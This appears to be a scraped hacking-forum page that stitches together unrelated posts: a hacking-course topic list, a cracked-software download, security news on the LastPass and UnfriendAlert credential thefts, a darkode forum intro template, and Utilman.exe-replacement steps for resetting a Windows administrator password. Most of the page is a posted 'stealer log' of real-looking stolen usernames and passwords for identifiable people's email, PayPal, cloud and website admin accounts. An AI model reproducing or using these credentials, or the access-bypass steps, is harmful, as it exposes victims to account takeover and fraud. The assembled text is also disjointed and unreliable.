ElGamal Signature Scheme o Challenges and Opportunities Digital Certifi cates CypherCalc Command Line Scriptor CryptoHeaven Hacking Tool: PGP Crack Magic Lantern Advanced File Encryptor Encryption Engine Encrypt Files Encrypt PDF Encrypt Easy Encrypt my Folder Advanced HTML Encrypt and Password Protect Encrypt HTML source Alive File Encryption Omziff ABC CHAOS EncryptOnClick CryptoForge SafeCryptor CrypTool Microsoft Cryptography Tools Polar Crypto Light CryptoSafe Crypt Edit CrypSecure Cryptlib Crypto++ Library Code Breaking: Methodologies Cryptanalysis Cryptography Attacks Brute-Force Attack Penetration Testing Introduction to Penetration Testing (PT) Vulnerability Assessment Limitations of Vulnerability Assessment Penetration Testing Types of Penetration Testing Risk Management Do-It-Yourself Testing Outsourcing Penetration Testing Services Terms of Engagement Project Scope Pentest Service Level Agreements Testing points Testing Locations Automated Testing Manual Testing Using DNS Domain Name and IP Address Information Enumerating Information about Hosts on Publicly Available Networks Testing Network-fi ltering Devices Enumerating Devices Denial-of-Service Emulation Pentest using Appscan HackerShield Pen-Test Using Cerberus Internet Scanner Pen-Test Using Cybercop Scanner Pen-Test Using FoundScan Hardware Appliances Pen-Test Using Nessus Pen-Test Using NetRecon Pen-Test Using SAINT Pen-Test Using SecureNet Pro Pen-Test Using SecureScan Pen-Test Using SATAN, SARA and Security Analyzer Pen-Test Using STAT Analyzer Pentest Using VigilENT Pentest Using WebInspect Pentest Using CredDigger Pentest Using Nsauditor Evaluating Different Types of Pen-Test Tools Asset Audit Fault Tree and Attack Trees Business Impact of Threat Internal Metrics Threat External Metrics Threat Calculating Relative Criticality Test Dependencies Defect Tracking Tools: Bug Tracker Server Disk Replication Tools DNS Zone Transfer Testing Tools Network Auditing Tools Trace Route Tools and Services Network Sniffi ng Tools Denial of Service Emulation Tools Traditional Load Testing Tools System Software Assessment Tools Operating System Protection Tools Fingerprinting Tools Port Scanning Tools Directory and File Access Control Tools File Share Scanning Tools Password Directories Password Guessing Tools Link Checking Tools Web-Testing Based Scripting tools Buffer Overfl ow protection Tools File Encryption Tools Database Assessment Tools Keyboard Logging and Screen Reordering Tools System Event Logging and Reviewing Tools Hacking Routers, cable Modems and Firewalls Network Devices Identifying a Router o SING: Tool for Identifying the Router HTTP Confi guration Arbitrary Administrative Access Vulnerability ADMsnmp Solarwinds MIB Browser Brute-Forcing Login Services Hydra Analyzing the Router Confi g Cracking the Enable Password Tool: Cain and Abel Implications of a Router Attack Types of Router Attacks Router Attack Topology Denial of Service (DoS) Attacks Packet “Mistreating” Attacks Routing Table Poisoning Hit-and-run Attacks vs. Persistent Attacks Cisco Router o Finding a Cisco Router o How to Get into Cisco Router o Breaking the Password o Is Anyone Here o Covering Tracks o Looking Around Eigrp-tool Tool: Zebra Tool: Yersinia for HSRP, CDP, and other layer 2 attacks Tool: Cisco Torch Monitoring SMTP(port25) Using SLcheck Monitoring HTTP(port 80) Cable Modem Hacking
  3. BlackWire calling spoof crack password! GirlShare - Download BlackWire.rar BlackKeys:fDeW5ISMx8jeKJMGB%2BJZrHTwgI0MgVSITg4M%2Bq7KHJzz8TZ9D%2ByTQ027KSrWscID%2Fpb2%2FC9TXvg9yT4S%0AZ28e3W1v7sC0YRn0GqNLxu350yk%3D
  4. Am gasit un link pe care il consider util.Sursa HF How Secure Is My Password?
  5. Just a moment... username:adytzu98
  6. source : https://www.dionach.com/blog/easily-grabbing-microsoft-sql-server-password-hashes
  7. Bad news first, folks. LastPass, our favorite password manager (and yours) has been hacked. It’s time to change your master password. The good news is, the passwords you have saved for other sites should be safe.The Intermediate Guide to Mastering Passwords with LastPass LastPass has announced on their company blog that they detected an intrusion to their servers. While encrypted user data (read: your stored passwords for other sites) was not stolen, the intruders did take LastPass account email addresses, password reminders, server per user salts, and authentication hashes. The latter is what’s used to tell LastPass that you have permission to access your account. According to LastPass, the authentication hashes should be sufficiently encrypted to prevent anyone from using them to access your account. However, the company is still prompting all users to update their master password that they use to log in to their LastPass account. If you use LastPass, you should do this immediately. If you share that master password with any other services, you should change it there, too. Finally, if you haven’t enabled two-factor authentication you should do that immediately here. Here's Everywhere You Should Enable Two-Factor Authentication Right Now We’ve talked about what happens if LastPass gets hacked before. As it stands, it doesn’t seem that this hack resulted in any significant data losses for users. However, it’s still important to take steps necessary to protect your account as soon as you can. LastPass Hacked, Change Your Master Password Now
  8. Today everybody wants to know — Who visited my Facebook profile?, Who unfriended me from the Facebook Friend list?, Who saw my Facebook posts?, and many other features that isn't provided by Facebook by default. So most Facebook users try to find out a software and fall victim to one that promises to accomplish their desired task. Hackers make use of this weakness and often design malicious programs in order to victimize broad audience. Following I am going to disclose the realities behind one such software designed cleverly to trick Facebook users to make them believe it is genuine. UnfriendAlert, a free application that notifies you whenever someone removes you from the Facebook friend list, has been found collecting its users' Facebook credentials. UnfriendAlert Stealing your Facebook Credentials: Security researchers at Malwarebytes have warned users of the UnfriendAlert app saying that the notorious app asks users to login with their Facebook credentials to activate unfriends monitoring and alert service for your Facebook profile. Facebook has provided API OAuth login system for third party applications, where users don't need to provide their Facebook credentials to them. So you should never submit your Facebook password to any third party service or desktop software in any case. Once you enter your login credentials, UnfriendAlert will send it to the website "yougotunfriended.com" owned by attackers. Late last month, UnfriendAlert was also classified as potentially unwanted program (PUP) which often displays unwanted advertisements and deceptively installs other malicious software and free apps when visiting some web pages in your Chrome, Firefox, and Internet Explorer, making you fail to block them. Uninstall UnfriendAlert and Change your Password Now! So users are recommended to uninstall UnfriendAlert App from your computer, and besides removing this, you are also advised to change your Facebook password as soon as possible. You can do this under "Settings —> Password —> Edit." Always do some research before installing any third party application as your one single mistake could compromise your online security and privacy in various ways. Source
  9. Introduction Post We need to know a little bit about you to consider approval into the forum. Please state who invited you followed by a brief description of your abilities. That is to say, what are you good at? What is your skill-set? What unique contribution can you bring to the forum that will make us want you here? Include links to your profile on other sites. This is so we can check your reputation on other forums to see if you are in good standing. Lastly, please leave your jabber so members can contact you. Or if you wish to keep it private state to request Jabber in pm. Hello, I'm <nickname>. I was invited by <person who invited you>. I'm a <developer> and I can contribute to the marketplace by <providing coding services/porno>. My <interests/hobbies/specializations> include <researching NT internals/reverse engineering/furious masturbation> and some recent projects I have been involved in include <creating a website/coding a backend/etc>. Here are some links to profiles of mine on other sites: <...>. My jabber is: <...> Thank you and let me know if you have any questions! Password Policy Reply with quote A minimal enforcement of the Password Policy is in place, full enforcement will begin shortly. Read the rules and if your password does not meet the requirements, update it immediately to avoid automatic lockout. If you're password is used for anything besides darkode change it immediately. Your password must be at least 15 characters long and contain atleast 1 uppercase, 1 lowercase, 1 numerical, and 1 special character. It must not resemble a word in any known dictionary or a word with letters replaced by numbers or anything similar. If you're password is used for anything besides darkode change it immediately (even if it meets the requirements). iX~1y$D.x5A%pFj!3Al$ is an example of a secure password. ZlA2pA4kGm6AnQi! is not as secure but works. Do not include a slash /\ quote " or parentheses () in your new password or you will be unable to login. If you're not recieving feedback and have trouble obtaining vouches, here is my suggestion: Amend your intro to include details, vague introduction posts will get you no-where and possibly deleted from the forum. You must get users of the forum to want you to be approved. You must show you can be a contribution to the forum, an asset. The best way to do this is making business while on intro and asking members to post feedback. Talk about what you have to offer and what types of projects you are interested in. Be specific, ensure if a user wants what you can offer, or has what you are looking for they know to contact you. To show your worth, give example screenshots, Proof of Concept Code, or code snippets with annotated descriptions.. Acum prezentarea mea! Salut si bine v-am gasit, sunt furioasa, cunosc html,php,vb, etc.. Most active forum m-am registrat pentru ca imi place sa stiu si sa citesc tot ce se invarte asupra IT.. Nu alerg dupa porno, dar ofer servicii in domeniul acesta! Daca doriti sa mai multe detali intrebati! Si acum va rog sa ma acceptati sa fac parte din acest forum.. Va multumesc!
  10. o intrebare se poate ? am un Toshiba Tecra A Series ... si am o problema . nu pot intra in bios din cauza a Supervisor Password . nu o stiu , nu am folosito niciodata !! inafara de schimbarea hdd'ului e vreo alta varianta ?:)
  11. 1) Boot from the Windows Server 2012 ISO 2) At Windows Setup menu, click Next 3) Chose Repair your computer 4) On Choose and option click Troubleshoot 5) Under Advanced options click Command Prompt Now on command prompt, run commands: d: cd windows\system32 ren Utilman.exe Utilman.exe.old copy cmd.exe Utilman.exe 6) Close command prompt and click “Continue”. 7) Server will now boot and present the logon screen. Here press Windows Key + U 8) In prompt you can now change the password typing the command: net user administrator Password This will set the password for Administrator to Password (case sensitive) Close CMD and you should be able to log back onto the server using the password you have provided in the last step. Author: razvan1@hy
  12. Google has been obliged to revise its Password Alert anti-phishing protection just hours after releasing it when security researchers showed how the technology was easily circumvented. Security consultant Paul Moore (@Paul_Reviews) has published a proof-of-concept JavaScript exploit that skirted the defensive technology with just seven lines of code. The Password Alert for Chrome browser plug-in is meant to trigger alerts for users in cases when they are induced to hand over their password to counterfeit sites impersonating Google (other online services aren't covered). The extension only kicks into action after users have signed into their Google account; thereafter it puts up warnings to reset Gmail passwords in cases where users are taken in by a phish. The problem is these alerts can be shut down with minimum effort and a few lines of JavaScript planted on counterfeit sites. More specifically, Moore's script looks for a warning banner every five milliseconds before removing anything it detects. Other approaches aimed at preventing humans actually seeing a warning – effectively killing off alerts kill as soon as they are generated – might also have been possible. Moore posted a short video on YouTube to highlight his concerns. Bypassing Google's Password Alert "Protection" Chris Boyd, a malware intelligence analyst at security software firm Malwarebytes, backed up worries about how easily Password Alert might be bypassed in a blog post that explains the issue in greater depth here. To its credit, Google responded promptly to the issue, updating its technology hours after El Reg flagged up the problem and requested a comment. "[The] issue is now fixed and the current version of Password Alert includes the patch," a spokesman told El Reg by email on Friday morning. Google's anti-phishing tech was only released on Wednesday so early teething troubles are arguably to be expected. Relying on Password Alert is, in any case, maybe not enough and users should consider turning on two-step authentication and/or using a full fat password manager such as LastPass to protect them from phishing attacks. Google researchers and a team from University of California, San Diego recently warned (PDF) that the most effective phishing attacks can succeed 45 per cent of the time. Source
  13. RYANCS1

    Stealer log

    Application: Google Chrome Host: https://www.dyndn.es/ Username: Fastnet@walla.com Password: Ratte113 Application: Google Chrome Host: https://www.dropbox.com/de/ Username: fastnet112@googlemail.com Password: Ratte112 Application: Google Chrome Host: http://192.168.100.2...namic_DNS.shtml Username: fastnet@walla.com Password: Ratte113 Application: Google Chrome Host: https://crytecsbs.local/Remote/logon Username: fastnet Password: Ratte112 Application: Google Chrome Host: https://accounts.goo...om/ServiceLogin Username: fastnet112@googlemail.com Password: Melissa78 Application: Google Chrome Host: https://192.168.100....ebman/index.cgi Username: admin Password: ratte112 Application: Google Chrome Host: https://192.168.100..../administrator/ Username: admin Password: 663852 Application: Google Chrome Host: https://192.168.100.140/Remote/logon Username: fastnet Password: Ratte112 Application: Google Chrome Host: http://www.iapphacks.com/ucp.php Username: Ratte112 Password: ratte112 Application: Google Chrome Host: https://www.dyndn.es/ Username: fastnet Password: Ratte113 Application: Google Chrome Host: https://tipido.com/g...space-anmelden/ Username: Fastnet@walla.com Password: Somm3r2013 Application: Google Chrome Host: http://www.lima-city.de/login Username: vipx Password: Somm3r2013 Application: Google Chrome Host: https://myds.synolog...rt/register.php Username: Fastnet@walla.com Password: Ratte113 Application: Google Chrome Host: http://www.x.gg/login Username: Fastnet@walla.com Password: YYCUvqEl Application: Google Chrome Host: http://85.214.72.143/fastnet/ Username: fastnet Password: hund88 Application: Google Chrome Host: https://www.facebook.com/login.php Username: Fastnet@walla.com Password: Melissa78+ Application: Google Chrome Host: http://vipx.square7.ch/administrator/ Username: admin Password: Somm3r2013 Application: Google Chrome Host: https://accounts.goo...om/ServiceLogin Username: Fastnet112@googlemail.com Password: Melissa78 Application: Google Chrome Host: https://warframe.com/signup Username: Fastnet Password: monster112 Application: Google Chrome Host: http://phpmyadmin.vi...e7.ch/index.php Username: vipx Password: vipx Application: Google Chrome Host: https://friends.walla.co.il/ Username: Fastnet Password: Ratte112 Application: Google Chrome Host: https://myds.synolog...ter_account.php Username: Fastnet@walla.com Password: 87654321 Application: Google Chrome Host: https://battlelog.ba...bf3/de/servers/ Username: Fastnet112@googlemail.com Password: Ratte112 Application: Google Chrome Host: http://192.168.100.1...admin/index.php Username: root Password: ratte112 Application: Google Chrome Host: http://battlelog.bat...om/all/de/gate/ Username: fastnet112@googlemail.com Password: Ratte112 Application: Google Chrome Host: https://www.amazon.de/ap/signin Username: antjemy@web.de Password: skellerup Application: Google Chrome Host: https://www.starstab...om/de/myaccount Username: antjemy@web.de Password: lotta1409 ========================== ate/Time: 23.01.2015 09:28:54 PC Name: CHRIS-THINK Windows Version: Windows 7 / Vista Application: FileZilla Host: iface.ff.lan Port: 22 Username: root Password: isitaplane Application: Google Chrome Host: http://helpdesk.blue...hilfe-anfordern Username: domi Password: domi Application: Google Chrome Host: http://www.grupo-max.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://test2.bluepoi.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://www.joomlart....s/downloads.php Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://test.bluepoint-service.at/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://osclass.bluep...admin/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://www.geco-group.com/de-home Username: christian.b@bluepoint-service.at Password: Sarese12! Application: Google Chrome Host: https://my.world4you.com/index.php Username: 50120485 Password: p9qk9g Application: Google Chrome Host: http://www.joomlacon...r.net/index.php Username: chrioll Password: Sarese12! Application: Google Chrome Host: https://webmail.world4you.com/ Username: info@florianueberall.at Password: florian! Application: Google Chrome Host: http://omcme.forumotion.com/login Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://www.4freelance.de/login Username: christian.b@bluepoint-service.at Password: Sarese12! Application: Google Chrome Host: https://crowdin.net/login Username: chrioll Password: sARESE!"1 Application: Google Chrome Host: http://goomaxx-vorsc...rator/index.php Username: cburger Password: Sarese12! Application: Google Chrome Host: https://adobeid-na1....der/pages/login Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://yeslider.com/...rator/index.php Username: demo Password: demo Application: Google Chrome Host: http://localhost:8000/admin/ Username: chrioll Password: chrioll Application: Google Chrome Host: http://www.fonts.com...eb-fonts/google Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://www.guia-acti...rator/index.php Username: cburger Password: Sarese12! Application: Google Chrome Host: http://www.boerse.bz...ung-2013-a.html Username: chrioll Password: lz639ad Application: Google Chrome Host: http://www.highlands.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: https://kuler.adobe....te/color-wheel/ Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://www.gmop.de/administrator/ Username: cburger Password: Chris,123 Application: Google Chrome Host: http://hsv1.bluepoin...rator/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://www.kareebu.com/login Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://192.168.178.3...rator/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://goomaxx-vorsc...e/single-advert Username: demo Password: demo Application: Google Chrome Host: http://www.tutorials...007-vba.281799/ Username: chrioll Password: mco727865 Application: Google Chrome Host: https://www.strato.d...CustomerService Username: 73382697 Password: oliver3977lukas Application: Google Chrome Host: https://twitter.com/...word_reset_sent Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://support.bluep...t/scp/login.php Username: chris Password: Sarese12! Application: Google Chrome Host: http://81.169.222.36/ Username: gmdev Password: Ir6k7OiZDo/+ Application: Google Chrome Host: https://registrierun...Eukm2_q-GA_RGfc Username: grupomaximus Password: 8d16d57a3 Application: Google Chrome Host: http://seblod.time4m.../anmeldung.html Username: chrioll.b Password: Sarese12! Application: Google Chrome Host: http://www.ms-office.../showthread.php Username: chrioll Password: mco727865 Application: Google Chrome Host: http://www.panosfx.com/log-in/ Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://portal.bony-club.eu/ Username: cburger Password: malaga Application: Google Chrome Host: http://mygully.com/t...enbuch-1825176/ Username: chrioll Password: mco727865 Application: Google Chrome Host: https://e16927-phpmy...es.easyname.eu/ Username: u9400db4 Password: GTtuENK Application: Google Chrome Host: http://i18n.osticket.com/join Username: chrioll Password: sARESE!"1 Application: Google Chrome Host: http://saenger.bluep.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://goomaxx1.blue...ass/install.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://ff.loc/scrum/ Username: luigi Password: mco727865 Application: Google Chrome Host: https://my.easyname.com/de/anmelden Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://www.guia-culi...rator/index.php Username: cburger Password: Sarese12! Application: Google Chrome Host: http://demo.magnolia...ia/admincentral Username: superuser Password: superuser Application: Google Chrome Host: http://www.bony-club.eu/administrator/ Username: cburger Password: Sarese12! Application: Google Chrome Host: https://www.strato.d...CustomerService Username: office Password: hitman47 Application: Google Chrome Host: http://sales.grupo-maximus.eu/ Username: office Password: romulus2014top Application: Google Chrome Host: https://app.asana.co...9605339434404/f Username: it-chris@grupo-maximus.eu Password: Sarese12! Application: Google Chrome Host: https://edit.yahoo.com/upgrade Username: chrioll65 Password: Sarese12! Application: Google Chrome Host: http://www.grupo-maximus.eu/ Username: cburger Password: malaga Application: Google Chrome Host: http://quirktools.com/me/ Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: https://www.template...za.com/register Username: chrioll Password: Sarese12! Application: Google Chrome Host: https://rubygems.org/sign_up Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://verein.bluepo...ogram/index.php Username: admin Password: lz639ad Application: Google Chrome Host: ftp://e16927-ftp.services.easyname.eu/ Username: 9400ftp16 Password: Adrian,123 Application: Google Chrome Host: http://www.goomaxx.eu/administrator/ Username: cburger Password: Sarese12! Application: Google Chrome Host: http://verwaltung.bl...int-service.at/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://bony.bluepoint-service.at/ Username: grupomaximus Password: klausi Application: Google Chrome Host: https://it.projektwe...7tfgcjm2hxn7rcd Username: christian.b@bluepoint-service.at Password: Sarese12! Application: Google Chrome Host: http://test.bluepoin...index.php/login Username: admin Password: Sarese12! Application: Google Chrome Host: http://office.bluepoint-service.at/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://verein.bluepo...profile_new.php Username: christian Password: Sarese12! Application: Google Chrome Host: https://grupomaximus...cloudforge.com/ Username: cburger1 Password: Sarese12! Application: Google Chrome Host: https://eu.battle.ne...eation/tos.html Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://helpdesk.blue...rator/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: https://app.cloudforge.com/session/new Username: cburger1 Password: Sarese12! Application: Google Chrome Host: http://osclass.bluep...ass/install.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://localhost/ Username: grupomaximus Password: klausi Application: Google Chrome Host: http://www.klagusch-.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://81.169.222.63/ Username: gmdev Password: Ir6k7OiZDo/+ Application: Google Chrome Host: https://www.adobe.co...n.exchange.html Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://demo.f4s.eu/w...ce/content/demo Username: chris-it@grupo-maximus.eu Password: Sarese12! Application: Google Chrome Host: ftp://192.168.178.36/ Username: chrioll Password: chrioll Application: Google Chrome Host: https://servisto.de/...demo/login.html Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://owncloud.bluepoint-service.at/ Username: admin Password: Sarese12! Application: Google Chrome Host: https://twitter.com/oauth/authenticate Username: chrioll@gmail.com Password: mco727865 Application: Google Chrome Host: http://couponlisting...php/all-coupons Username: demo Password: demo Application: Google Chrome Host: https://www.xing.com...istian_Burger36 Username: christian.b@bluepoint-service.at Password: Sarese12! Application: Google Chrome Host: https://www.amazon.de/ap/signin Username: office@bluepoint-service.at Password: Sarese12! Application: Google Chrome Host: https://www.strato.d...CustomerService Username: 73459150 Password: hitman47 Application: Google Chrome Host: http://forum.admidio.org/ucp.php Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://pligg.bluepoint-service.at/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://www.geco-grou.../web/guest/home Username: christian.b@bluepoint-service.at Password: Sarese12! Application: Google Chrome Host: http://www.imapbuild...n/index-rc1.php Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://www.joomlackeditor.com/register Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://www.admidio.org/forum/ucp.php Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://www.schiessen-lienz.at/ Username: admin Password: glockat Application: Google Chrome Host: http://goomaxx-vorsc...n/single-advert Username: demo Password: demo Application: Google Chrome Host: http://www.dolomiten...at/wp-login.php Username: griasenk Password: Sarese12! Application: Google Chrome Host: http://www.joomlaportal.de/login.php Username: chrioll Password: mco727865 Application: Google Chrome Host: http://hsv1.bluepoin...rator/index.php Username: author Password: author Application: Google Chrome Host: http://test2.bluepoi...rator/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: https://adobeid-na1..../create_account Username: chris@formfinder.at Password: Sarese12! Application: Google Chrome Host: http://www.bony-club.eu/ Username: cburger Password: malaga Application: Google Chrome Host: http://goomaxx-vorsc....php/en/logout1 Username: cburger Password: Sarese12! Application: Google Chrome Host: http://85.214.78.91/ Username: cburger Password: malaga Application: Google Chrome Host: http://new.wasser-re.../administrator/ Username: admin Password: tempor Application: Google Chrome Host: http://office.bluepoint-service.at/ Username: chris Password: Sarese12! Application: Google Chrome Host: http://192.168.1.1/ Username: admin Password: admin Application: Google Chrome Host: http://81.169.221.205/redmine/login Username: cburger Password: Sarese12!? Application: Google Chrome Host: http://ff.loc/scrum/index.php Username: chris Password: Sarese12! Application: Google Chrome Host: https://boerse.to/th...xisbuch.389380/ Username: chrisburg Password: O8-s5Q31 Application: Google Chrome Host: https://www.evernote.com/Login.action Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://www.boerse.bz/ Username: chrioll Password: lz639ad Application: Google Chrome Host: http://goomaxx-vorsc...omponent/users/ Username: cburger Password: Sarese12! Application: Google Chrome Host: http://www.seblod.com/index.php Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://www.bang2joom.com/plan/login Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://demo.owncloud.org/ Username: test Password: test Application: Google Chrome Host: http://activos-vorsc.../administrator/ Username: cburger Password: Sarese12! Application: Google Chrome Host: http://verein.bluepo...ystem/login.php Username: admin Password: lz639ad Application: Google Chrome Host: http://office.bluepoint-service.at/ Username: andreas Password: Glock19! Application: Google Chrome Host: http://goomaxx.bluep...admin/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: https://github.com/session Username: chrioll Password: Sarese12! Application: Google Chrome Host: https://accounts.goo...om/ServiceLogin Username: chriollweb@gmail.com Password: Sarese12! Application: Google Chrome Host: http://www.pasha-rea...rator/index.php Username: heico Password: hitman47 Application: Google Chrome Host: https://webmail.easyname.eu/ Username: 9400mail6 Password: Sarese12! Application: Google Chrome Host: http://pastebin.com/signup Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://www.w-b-s.net/ Username: cburger Password: Sarese12! Application: Google Chrome Host: http://demo.foobla.c.../administrator/ Username: demo Password: demo Application: Google Chrome Host: https://www.dropbox.com/login Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://goomaxx-vorsc.../administrator/ Username: cburger Password: Sarese12! Application: Google Chrome Host: https://www.share-on....biz/user/login Username: 08088816435 Password: UqMsD3Fmb Application: Google Chrome Host: https://www.share-on...egister/premium Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://www.w-b-s.net.../wiki/index.php Username: cburger Password: chris2014 Application: Google Chrome Host: http://localhost/joomla/administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://www.goomaxx.eu/ Username: cburger Password: malaga Application: Google Chrome Host: http://ordasoft.com/ Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://owncloud.blue...ce.at/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: https://communicator....de/ox6/ox.html Username: chris-it@grupo-maximus.eu Password: Sarese12! Application: Google Chrome Host: https://idmsa.apple....Auth/login.html Username: chrioll65@me.com Password: Sarese12! Application: Google Chrome Host: http://office.bluepo...ce.at/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://joomla35.ijoo...x.php/ad-agency Username: demo Password: demo Application: Google Chrome Host: http://www.nauticexp...096-216658.html Username: chris@wasser-rettung.net Password: Sarese12! Application: Google Chrome Host: http://wiki.bluepoin...ce.at/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://forums.osclass.org/register2/ Username: christian.b@bluepoint-service.at Password: Sarese12! Application: Google Chrome Host: https://www.addthis.com/register Username: christian.burger@grupo-maximus.eu Password: Sarese12! Application: Google Chrome Host: http://www.guia-culinaria.eu/ Username: cburger Password: malaga Application: Google Chrome Host: https://app.cloudfor...vitations/30847 Username: Burger Password: Sarese12! Application: Google Chrome Host: https://accounts.goo...om/ServiceLogin Username: maximusgoomaxx@gmail.com Password: KZbDcf3G Application: Google Chrome Host: http://goomaxx-vorsc...n/single-advert Username: demo Password: demo Application: Google Chrome Host: http://introduction....ypo3.org/typo3/ Username: admin Password: password Application: Google Chrome Host: https://www.paypal.c...ebapps/mpp/home Username: christian.burger@grupo-maximus.eu Password: Sarese12! Application: Google Chrome Host: http://localhost/phpmyadmin/ Username: root Password: chrioll Application: Google Chrome Host: https://accounts.goo...om/ServiceLogin Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://localhost/hosting/login.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://localhost/gottl/administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://front.bluepoi...ce.at/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: https://accounts.goo...om/ServiceLogin Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://81.169.222.63/dbadmintool/ Username: grupo_maximus Password: 6Grewq7er Application: Google Chrome Host: https://communicator...com/ox6/ox.html Username: chris-it@grupo-maximus.eu Password: Sarese12! Application: Google Chrome Host: https://www.deviantart.com/join/ Username: chrioll Password: mco727865 Application: Google Chrome Host: https://www.xing.com/ Username: christian.b@bluepoint-service.at Password: Sarese12! Application: Google Chrome Host: http://81.169.222.63...rator/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://www.pixelio.de/ Username: chrioll Password: mco727865 Application: Google Chrome Host: http://www.boerse.bz...ele/index5.html Username: chrioll Password: lz639ad Application: Google Chrome Host: http://hsv.bluepoint...rator/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://cloud.bluepoint-service.at/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://verein.bluepo...login_check.php Username: admin Password: lz639ad Application: Google Chrome Host: https://www.dropbox.com/ Username: chrioll@me.com Password: Sarese12! Application: Google Chrome Host: http://elgg.bluepoint-service.at/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://www.bootply.com/UIc6GLkWrb Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://data.formfinder.at/ Username: superadmin Password: 987KdaE2 Application: Google Chrome Host: http://www.faboba.com/component/uu/ Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://www.schiessen...index.php/login Username: author Password: author Application: Google Chrome Host: http://hsv1.bluepoin...rator/index.php Username: hans Password: hansmoser Application: Google Chrome Host: http://www.bluepoint.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://demo.kandanda.../administrator/ Username: demo Password: demo Application: Google Chrome Host: https://frontify.com/signup/ Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://blue.bluepoin.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: https://www.dropbox.com/ Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://highlands-ost...rator/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: https://login.yahoo.com/config/login Username: chrioll65 Password: Sarese12! Application: Google Chrome Host: http://www.grupo-max...rator/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://hsv1.bluepoin.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: https://www.odesk.com/login Username: christian.b@bluepoint-service.at Password: Sarese12! Application: Google Chrome Host: http://t3.bluepoint-...rator/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://www.guia-activos.eu/ Username: cburger Password: malaga Application: Google Chrome Host: https://www.goetzfri...om/template.php Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://jomclassified...orum/index.html Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://helpdesk.blue...index.php/login Username: agent1 Password: agent1 Application: Google Chrome Host: http://www.dmxzone.c...free-extension/ Username: chrioll Password: mco727865 Application: Google Chrome Host: http://www.dmxzone.c...free-extension/ Username: chrioll Password: mco727865 Application: Google Chrome Host: http://verein.bluepo...nstallation.php Username: admin Password: lz639ad Application: Google Chrome Host: http://www.sxc.hu/browse.phtml Username: chrioll Password: mco727865 Application: Google Chrome Host: http://demo.joombri.in/ Username: freelancer Password: password Application: Google Chrome Host: http://81.169.181.15.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://www.processon.com/login Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://helpdesk.bluepoint-service.at/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://bootsnipp.com/register Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://open.bluepoint-service.at/ Username: chrioll@gmail.com Password: i41B4fo Application: Google Chrome Host: http://demo.joomlacontenteditor.net/ Username: demo Password: demo Application: Google Chrome Host: http://www.w-b-s.net/ Username: grupomaximus Password: ifnok5gfU0! Application: Google Chrome Host: http://webmail.binarydigit.at/ Username: chris@wasser-rettung.net Password: mco727865 Application: Google Chrome Host: 